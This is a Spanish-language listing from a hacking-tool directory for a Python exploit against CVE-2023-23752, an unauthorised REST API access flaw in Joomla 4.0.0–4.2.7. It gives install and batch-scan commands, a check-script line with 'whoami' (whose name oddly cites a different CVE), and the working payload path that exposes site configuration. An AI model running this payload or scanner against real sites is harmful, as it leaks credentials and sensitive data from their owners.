Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-23752 — Exploit basado en Python para CVE-2023-23752 dirigido a Joomla 4.0.0-4.2.7, acceso no autorizado a la API REST, permitiendo la divulgación de información sensible a través de payloads manipulados. | Kitploit
Herramientas/GitHubGitHub/ytxzx/cve-2023-23752
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubytxzx/cve-2023-23752

CVE-2023-23752

Exploit basado en Python para CVE-2023-23752 dirigido a Joomla 4.0.0-4.2.7, acceso no autorizado a la API REST, permitiendo la divulgación de información sensible a través de payloads manipulados.

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-23752 - Reaparición de la vulnerabilidad de acceso no autorizado de Joomla

Uso del script

Instalar la biblioteca de python

pip install -r requirements.txt

Verificación de vulnerabilidad

python3 CVE-2022-26134_check.py -u url -c whoami

image

Escaneo por lotes

python3 CVE-2023-23752.py -f url_part.txt

image

Versiones afectadas

4.0.0 <= Joomla <= 4.2.7

Recreación de la vulnerabilidad

payload:

/api/index.php/v1/config/application?public=true

Acceda a la dirección de la vulnerabilidad, capture el tráfico y reproduzca los paquetes.

image

Principio de la vulnerabilidad

En Joomla! CMS versiones 4.0.0 - 4.2.7, debido a restricciones inadecuadas de acceso a los puntos finales del servicio web, podría permitir el acceso no autorizado a la API REST, lo que provoca fuga de información sensible.

Descargar herramienta